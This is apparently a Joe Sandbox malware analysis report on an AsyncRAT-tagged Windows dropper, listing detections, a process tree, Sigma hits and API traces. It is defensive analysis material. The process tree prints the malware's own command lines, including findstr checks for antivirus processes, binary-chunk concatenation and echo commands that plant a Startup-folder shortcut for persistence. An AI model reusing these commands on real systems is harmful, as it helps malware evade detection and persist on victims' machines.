Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C3KzPHU3UG.exe

Overview

General Information

Sample name:C3KzPHU3UG.exe
renamed because original name is a hash value
Original sample name:b1202e7766f87458e7bbee5a2b2103ca.exe
Analysis ID:1502253
MD5:b1202e7766f87458e7bbee5a2b2103ca
SHA1:a1e2d3d973fc37992a07668ab024f5df81e1545a
SHA256:48a4042854a402824d35f4c95aed1e448d652d79ed0c251635acbc073200dfcf
Tags:AsyncRATexeRAT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • C3KzPHU3UG.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\C3KzPHU3UG.exe" MD5: B1202E7766F87458E7BBEE5A2B2103CA)
    • cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7756 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7764 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7836 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7872 cmdline: cmd /c md 585723 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7888 cmdline: findstr /V "TranscriptHousesConstitutesMedicaid" Hate MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7904 cmdline: cmd /c copy /b ..\Rod + ..\Keep + ..\Prep + ..\Tsunami + ..\Invitations F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Designing.pif (PID: 7920 cmdline: Designing.pif F MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • cmd.exe (PID: 7952 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & echo URL="C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7936 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 8072 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • EchoSync.pif (PID: 8116 cmdline: "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pif" "C:\Users\user\AppData\Local\SyncTech Innovations\p" MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , ProcessId: 8072, ProcessName: wscript.exe
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Designing.pif F, CommandLine: Designing.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\585723\Designing.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\585723\Designing.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\585723\Designing.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: Designing.pif F, ProcessId: 7920, ProcessName: Designing.pif
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.js" , ProcessId: 8072, ProcessName: wscript.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7952, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoSync.url

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Search for Antivirus process
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Sexuality Sexuality.cmd & Sexuality.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7836, ProcessName: findstr.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: C3KzPHU3UG.exeReversingLabs: Detection: 33%
Source: C3KzPHU3UG.exeVirustotal: Detection: 36%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
Source: C3KzPHU3UG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00405B98 FindFirstFileW,FindClose,0_2_00405B98
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406559
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_004029F1 FindFirstFileW,0_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B94005
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00B9494A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B93CE2
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00B9C2FF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00B9CD9F
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9CD14 FindFirstFileW,FindClose,10_2_00B9CD14
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B9F5D8
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B9F735
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00B9FA36
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F4005
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_006F494A
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FC2FF
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FCD14 FindFirstFileW,FindClose,15_2_006FCD14
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_006FCD9F
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF5D8
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_006FF735
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_006FFA36
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_006F3CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\585723\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\585723Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: unknownDNS traffic detected: query: XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BA29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_00BA29BA
Source: global trafficDNS traffic detected: DNS query: XfYprRGwPXpYAiIF.XfYprRGwPXpYAiIF
Source: C3KzPHU3UG.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C3KzPHU3UG.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: C3KzPHU3UG.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: C3KzPHU3UG.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: C3KzPHU3UG.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: C3KzPHU3UG.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: C3KzPHU3UG.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: C3KzPHU3UG.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: C3KzPHU3UG.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: C3KzPHU3UG.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C3KzPHU3UG.exeString found in binary or memory: http://ocsp.digicert.com0
Source: C3KzPHU3UG.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: C3KzPHU3UG.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: C3KzPHU3UG.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: C3KzPHU3UG.exe, 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif, 0000000A.00000000.1685729671.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp, EchoSync.pif, 0000000F.00000002.2896500055.0000000000759000.00000002.00000001.01000000.00000008.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: C3KzPHU3UG.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Statute.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Designing.pif, 0000000A.00000002.2897348002.0000000003D50000.00000004.00000020.00020000.00000000.sdmp, Designing.pif, 0000000A.00000003.1692425832.0000000004577000.00000004.00000800.00020000.00000000.sdmp, Designing.pif.1.dr, EchoSync.pif.10.dr, Statute.0.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00404BB4 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404BB4
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BA4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00BA4830
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_00704830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00704830
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BA4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00BA4632
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B90508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_00B90508
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BBD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00BBD164
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_0071D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_0071D164

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B942D5: CreateFileW,DeviceIoControl,CloseHandle,10_2_00B942D5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B88F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00B88F2E
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00403415 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403415
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B95778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00B95778
Source: C:\Users\user\AppData\Local\SyncTech Innovations\EchoSync.pifCode function: 15_2_006F5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_006F5778
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_0040447D0_2_0040447D
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_0040680A0_2_0040680A
Source: C:\Users\user\Desktop\C3KzPHU3UG.exeCode function: 0_2_00406E340_2_00406E34
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3B02010_2_00B3B020
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B394E010_2_00B394E0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B39C8010_2_00B39C80
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B523F510_2_00B523F5
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB840010_2_00BB8400
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B6650210_2_00B66502
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B3E6F010_2_00B3E6F0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B6265E10_2_00B6265E
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5282A10_2_00B5282A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B689BF10_2_00B689BF
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB0A3A10_2_00BB0A3A
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B66A7410_2_00B66A74
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B40BE010_2_00B40BE0
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B8EDB210_2_00B8EDB2
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5CD5110_2_00B5CD51
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00BB0EB710_2_00BB0EB7
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B98E4410_2_00B98E44
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B66FE610_2_00B66FE6
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B533B710_2_00B533B7
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B5F40910_2_00B5F409
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B4D45D10_2_00B4D45D
Source: C:\Users\user\AppData\Local\Temp\585723\Designing.pifCode function: 10_2_00B516B410_2_00B516B4
